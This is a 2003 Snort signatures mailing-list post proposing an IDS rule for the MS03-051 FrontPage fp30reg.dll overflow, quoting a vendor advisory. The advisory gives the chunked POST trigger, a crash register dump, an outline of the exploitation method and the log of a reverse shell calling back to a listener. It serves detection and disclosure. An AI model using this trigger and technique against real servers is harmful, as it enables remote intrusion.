[Snort-sigs] Sig for MS03-051

Frank Knobbe frank at ...1978...
Wed Nov 12 10:55:09 EST 2003

Does this look acceptable?

(msg:"WEB-FRONTPAGE Chunked Transfer-Encoding Post";
flow:to_server,established; uricontent:"/_vti_bin/_vti_aut";
content:"Transfer-Encoding\:"; nocase; content:"chunked"; nocase;
rev:1; sid:11111111111;)

It's a sig attempt for:
= Frontpage Extensions Remote Command Execution
= MS Bulletin posted: 
= http ://www.microsoft.com/technet/security/bulletin/ms03-051.asp
= Affected Software:
=       Microsoft Windows 2000 Service Pack 2, Service Pack 3 
=       Microsoft Windows XP, Microsoft Windows XP Service Pack 1 
=       Microsoft Office XP, Microsoft Office XP Service Release 1 
= Public disclosure on November 11, 2003

Continuing 'The Methodical Approach To Finding Overflows' we moved to
the next attack avenue. After the success against nsiislog.dll we were
again greeted by an access violation message leading to the discovery
of another remote vulnerability.

== Description ==

Sending a chunked encoded post to fp30reg.dll will cause an access
violation resulting in the following error log.

Event Type:     Warning
Event Source:   W3SVC
Event Category: None
Event ID:       37
Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly. 

A chunked encoded post will result in the control of ECX and EDI, with
the exception occurring at a mov dword ptr [ECX+4],EDI instruction
to remote command execution with privileges associated with the
IWAM_machinename account.

== Chunked Transfer-Encoding Post ==

POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Transfer-Encoding: chunked


== Exploitation ==

[Code Segment]
 67D46AD3 mov ecx,dword ptr [ebx+edx+8]
 67D46AD7 mov edi,dword ptr [ebx+edx+4]
 67D46ADB mov dword ptr [ecx+4],edi

 EAX = 046F83E8 EBX = 00000010 ECX = 58585858           
 EDX = 05450FEC ESI = 0000000C EDI = 58585858           
 EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668

 05450FEC  11 00 00 00 58 58 58  ....XXX
 05450FF3  58 58 58 58 58 58 58  XXXXXXX
 05450FFA  58 58 58 58 58 58 58  XXXXXXX
 05451001  58 58 58 58 58 58 58  XXXXXXX
 05451008  58 58 58 58 58 58 58  XXXXXXX
 0545100F  58 58 58 58 58 58 58  XXXXXXX
 05451016  58 58 58 58 58 58 58  XXXXXXX

Many different ways to exploit this malloc/free scenario, so instead of
the usual SEH redirect to a JMP instruction, we took a two step approach
for higher reliability.

At the first exception error we are in control of ECX and EDI allowing
us to write our JMP instruction to a known writeable space. This does
not cause an exception and execution flow continues through to a CALL
instruction that uses a value from our buffer. We use this CALL to
reach our JMP instruction.

== Exploit Example ==


** FP30REG.DLL - Ver - Remote Shell **

. Calling Home: blackhole:2000
. Using: 0x---------h as writeable data space 
. Shellcode Size: 304 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To
. Sending Exploit......Exploit Sent
. Connection Received

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

== Solutions ==

- Every day is a 0-day day on the Internet. Limiting the avenues of
  can be a key factor in reducing the risk to a web server. Programs
  as secureIIS and URLscan should be setup to reduce the number of
  that can be used to send data to a server. Removing unnecessary
  files and isapi extensions reduces the number of listeners that data
  be fed to limiting the number of vulnerabilities that a server is
  susceptible to.
- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft January 30, 2003 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20031112/6c3872de/attachment.sig>

More information about the Snort-sigs mailing list